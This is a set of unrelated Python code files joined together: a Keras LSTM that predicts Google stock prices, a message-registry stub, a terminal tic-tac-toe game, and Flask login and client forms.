from sklearn.preprocessing import MinMaxScaler
sc = MinMaxScaler(feature_range = (0, 1))
training_set_scaled = sc.fit_transform(training_set)
volume_set_scaled = sc.fit_transform(volume_set)
# Creating a data structure with 60 timesteps and 1 output
V_train = []
X_train = []
y_train = []
#for i in range(60, samples):
#try two day ahead so it's 60~1256, shift two row
for i in range(time_step, train_samples-fore_step):
X_train.append(training_set_scaled[i-time_step:i, 0])
V_train.append(volume_set_scaled[i-time_step:i, 0])
y_train.append(training_set_scaled[i+fore_step, 0])
y_train = np.array(y_train)
#X_train = np.array(X_train)
#V_train = np.array(V_train)
mer_train = [None]*(len(X_train)+len(V_train))
mer_train[::2] = X_train
mer_train[1::2] = V_train
X_train = np.array(mer_train)
# Reshaping
#X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 1))
X_train = np.reshape(X_train, (train_samples-time_step-fore_step, time_step, feature_size))
# Part 2 - Building the RNN
# Importing the Keras libraries and packages
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.layers import Dropout
from keras.models import load_model
from pathlib import Path
#import os
##os.path.isfile('regressor.h5')
my_file = Path("regressor.h5")
if my_file.is_file():
# returns a compiled model
# identical to the previous one
regressor = load_model('regressor.h5')
else:
# Initialising the RNN
regressor = Sequential()
# Adding the first LSTM layer and some Dropout regularisation
regressor.add(LSTM(units = 50, return_sequences = True,
input_shape = (X_train.shape[1], feature_size)))
regressor.add(Dropout(0.2))
# Adding a second LSTM layer and some Dropout regularisation
regressor.add(LSTM(units = 50, return_sequences = True))
regressor.add(Dropout(0.2))
# Adding a third LSTM layer and some Dropout regularisation
regressor.add(LSTM(units = 50, return_sequences = True))
regressor.add(Dropout(0.2))
# Adding a fourth LSTM layer and some Dropout regularisation
regressor.add(LSTM(units = 50))
regressor.add(Dropout(0.2))
# Adding the output layer
regressor.add(Dense(units = 1))
# Compiling the RNN
regressor.compile(optimizer = 'adam', loss = 'mean_squared_error')
# Fitting the RNN to the Training set
regressor.fit(X_train, y_train, epochs=180, batch_size=32)
regressor.save('regressor.h5') # creates a HDF5 file 'my_model.h5'
#del model # deletes the existing model
# Part 3 - Making the predictions and visualising the results
# Getting the real stock price of 2017
dataset_test = pd.read_csv('Google_Stock_Price_Test.csv')
real_stock_price = dataset_test.iloc[:, 1:2].values
# Getting the predicted stock price of 2017
volume_total = pd.concat((dataset_train['Volume'], dataset_test['Volume']), axis = 0)
dataset_total = pd.concat((dataset_train['Open'], dataset_test['Open']), axis = 0)
volume_inputs = volume_total[len(volume_total) - len(dataset_test) - time_step :].values
volume_inputs = volume_inputs / volume_downsize
volume_inputs = volume_inputs.reshape(-1,1)
volume_inputs = sc.transform(volume_inputs)
inputs = dataset_total[len(dataset_total) - len(dataset_test) - time_step :].values
inputs = inputs.reshape(-1,1)
inputs = sc.transform(inputs)
V_test = []
X_test = []
for i in range(time_step, time_step+test_samples):
V_test.append(volume_inputs[i-time_step:i, 0])
X_test.append(inputs[i-time_step:i, 0])
mer_train = [None]*(len(X_test)+len(V_test))
mer_train[::2] = X_test
mer_train[1::2] = V_test
X_test = np.array(mer_train)
#X_test = np.array(X_test)
#X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1))
print(X_test.shape[0])
X_test = np.reshape(X_test, (test_samples, time_step, feature_size))
#output 3 day ahead
predicted_stock_price = regressor.predict(X_test)
#want to extract the first 2 rows and first 3 columns A_NEW = A[0:2,0:3]
filler_test = predicted_stock_price[0:3, :]
#filler_test = np.reshape(filler_test, (fore_step,1))
#predicted_stock_price = np.vstack((filler_test, predicted_stock_price))
#print(type(predicted_stock_price)) #'numpy.ndarray'
predicted_stock_price = sc.inverse_transform(predicted_stock_price)
#print(predicted_stock_price.shape) #(20,1)
# Visualising the results
plt.grid(linestyle='--', color='black')
#plt.grid(color='gray', linestyle='dashed', linewidth='0.5')
plt.plot(real_stock_price, color = 'red', label = 'Real Google Stock Price')
plt.plot(predicted_stock_price, color = 'blue', label = 'Predicted Google Stock Price')
plt.title('Google Stock Price Prediction')
plt.xlabel('Time')
plt.ylabel('Google Stock Price')
plt.legend()
plt.show()
|
# relative
from .abstract_node_msg_registry import AbstractNodeMessageRegistry
class DomainMessageRegistry(AbstractNodeMessageRegistry):
"""A class for registering messages that can be used by the domain service."""
|
from txt_game.tic_tac_toe.statistics import read_statistics, save_statistics, gen_game_stats
from txt_game.tic_tac_toe.comp import make_move as comp_move
from txt_game.tic_tac_toe.settings import modes
from txt_game.rendering import rend_board, clr
import random as rnd
def run_game(settings, mode):
"""
Start tic tac toe game.
Use setting and mode. Save game statistics in JSON file.
"""
statistics = read_statistics()
board = [' ' for _ in range(9)]
clr()
value = input(f'Game settings:\n'
f'\tMode:\t{modes[mode]}\n'
f'\tPlayer 1 nick:\t{settings["Player 1"]}\n'
f'\tPlayer 2 nick:\t{settings["Player 2"]}\n'
f'\tLevel:\t{settings["Level"]}\n'
f'For starting press Enter,\n'
f'else input someone that back in menu and change setting.')
if value: # if value then return to menu
return
game_stats = gen_game_stats(settings, mode) # dict for accumulate statistics for this game
game_stats['First'] = def_who_first(settings, mode) # define beginner
clr(rend_board(board)) # clear terminal and show empty board
moves = 0 # counter for moves
active_player = game_stats['First'] # active player -> beginner
inactive_player = def_inactive_player(active_player, mode) # inactive player -> second player (according mode)
while True: # One cycle per move
# Make a move
if active_player == 'Comp':
cell = comp_move(board, game_stats['Level']) # comp select cell
else:
cell = player_move(board, active_player, game_stats[active_player]) # player input selected cell
# Define char for filling cell
if active_player == game_stats['First']:
board[cell] = 'X' # beginner moved by X
else:
board[cell] = 'O'
moves += 1
clr(rend_board(board)) # upd board after moving
if check_win(board):
game_stats['Winner'] = active_player
game_stats['Moves'] = moves
clr(rend_board(board))
print(f'Win {active_player}: {game_stats[active_player]}!')
if 'Games' not in statistics:
statistics['Games'] = []
statistics['Games'].append(game_stats)
input('Press Enter then return in menu')
break
if moves >= 9:
game_stats['Moves'] = moves
clr(rend_board(board))
print(f'DRAW!')
if 'Games' not in statistics:
statistics['Games'] = []
statistics['Games'].append(game_stats)
input('Press Enter then return in menu')
break
active_player, inactive_player = inactive_player, active_player # swap players
save_statistics(statistics)
def check_win(b):
"""
Check win's combinations.
"""
for i in range(3):
if b[i * 3] == b[i * 3 + 1] == b[i * 3 + 2] and (b[i * 3] != ' '): # horizontal lines
return True
if b[i] == b[i + 3] == b[i + 6] and (b[i] != ' '): # vertical lines
return True
if (b[0] == b[4] == b[8] and b[0] != ' ') or (b[2] == b[4] == b[6] and b[2] != ' '): # diagonals
return True
def player_move(board, player, nick):
"""
Allow input selected cell by player.
"""
try:
cell = int(input(f'{player}: Choose empty cell, {nick}: -->'))
except:
cell = -1
if cell in [i for i, char in enumerate(board) if char == ' ']:
return cell
else:
print('The cell must be empty. Choose another cell.')
return player_move(board, player, nick)
def def_inactive_player(active_player, mode):
"""
Define inactive player.
"""
if active_player == 'Comp' or active_player == 'Player 2':
return 'Player 1'
elif mode == '1':
return 'Comp'
elif mode == '2':
return 'Player 2'
def def_who_first(settings, mode):
"""
Define beginner according settings.
"""
if mode == '1':
if settings['Who first'] == 'Random':
return rnd.choice(['Player 1', 'Comp'])
elif settings['Who first'] == 'Player':
return 'Player 1'
else:
return 'Comp'
elif mode == '2':
return rnd.choice(['Player 1', 'Player 2'])
def def_mode():
"""
Allow choose game mode.
"""
mode = input('Hello, choose mode: 1 - Comp VS Player; 2 - Player 1 VS Player 2; 3 - Comp 1 VS Comp 2;\n-->')
if mode in '123':
return mode
else:
print(f'Incorrect mode: {mode}. Please, choose again.')
return def_mode() # Use recursion while correct input
|
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField
from wtforms.validators import DataRequired
class ClientForm(FlaskForm):
first_name = StringField('imie', validators=[DataRequired()])
last_name = StringField('nazwisko', validators=[DataRequired()])
class LoginForm(FlaskForm):
login = StringField('Login', validators=[DataRequired()])
password = PasswordField('Hasło', validators=[DataRequired()])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.